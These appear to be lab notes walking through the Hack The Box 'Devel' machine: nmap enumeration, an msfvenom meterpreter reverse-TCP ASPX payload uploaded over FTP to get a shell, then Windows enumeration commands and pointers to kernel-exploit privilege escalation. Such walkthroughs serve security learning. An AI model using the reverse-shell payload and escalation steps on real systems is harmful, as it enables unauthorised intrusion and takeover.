Skip to content

The Devel ( Box 1)

image.png

Enumeration :

nmap -A -T4 -p- <Machine_IP>

image 1.png


image 2.png


image 3.png

The wappalyzer shows the Web Servers is IID 7.5


Msfvenom Cheat Sheet


image 4.png

image 5.png

msfvenom -p windows/meterpreter/reverse_tcp LHOST= 10.10.14.4 LPORT= 4444 -f aspx > exploit.aspx

image 6.png


image 7.png

What we are doing here is again connecting to ftp server via it's credentials then uploading the exploit to the website.

put exploit.aspx


Execute the exploit :

image 8.png


Boom we are in : >

image 9.png

The steps which we performed earlier are to gain access for low level user from here we are going to leverage out current role : IIS APPPOOL/web to higher privelage or system level user to be specific.


Further System Enumeration


image 10.png

image 11.png

image 12.png

image 13.png

WMIC > Windows Management Instrumentation Command-line

It's a command-line utility that provides a way to interact with and manage data and operations on a Windows system using Windows Management Instrumentation (WMI). WMIC is used to retrieve information about hardware, software, and other system aspects.


image 14.png


The qfe > is quick fix engineering

image 15.png


wmic logicaldisk get caption, description, providername

image 16.png


USER BASED ENUMERATION


image 17.png


image 18.png


image 19.png


image 20.png


image 21.png


image 22.png


Network Enumeration

ipconfig

ipconfig /all 

arp -a

route print

netstart -ano   > to check all the ports

Password Hunting


image 23.png

Privilege Escalation - Windows · Total OSCP Guide

Windows - Privilege Escalation - Internal All The Things


AV Enumeration


This section is for Antivirus and Firewall configuration


image 24.png

sc is service control


image 25.png

It will tell about all the services running in the Windows : XD


To check the firewall is running or not


image 26.png


image 27.png


netsh firewall show config > Displays the config of Firewall


Before all the things were to learn how to perform things manually !

Automated Tool Overview


image 28.png

All the tools are for Windows purpose


image 29.png


image 30.png

These are all the vulnerabilities which we got via Metasploirt.


Escalation Path: Kernel Exploits


GitHub - SecWiki/windows-kernel-exploits: windows-kernel-exploits Windows平台提权漏洞集合


image 31.png


Windows Kernel Architecture

image 32.png


If we own the kernel we own the System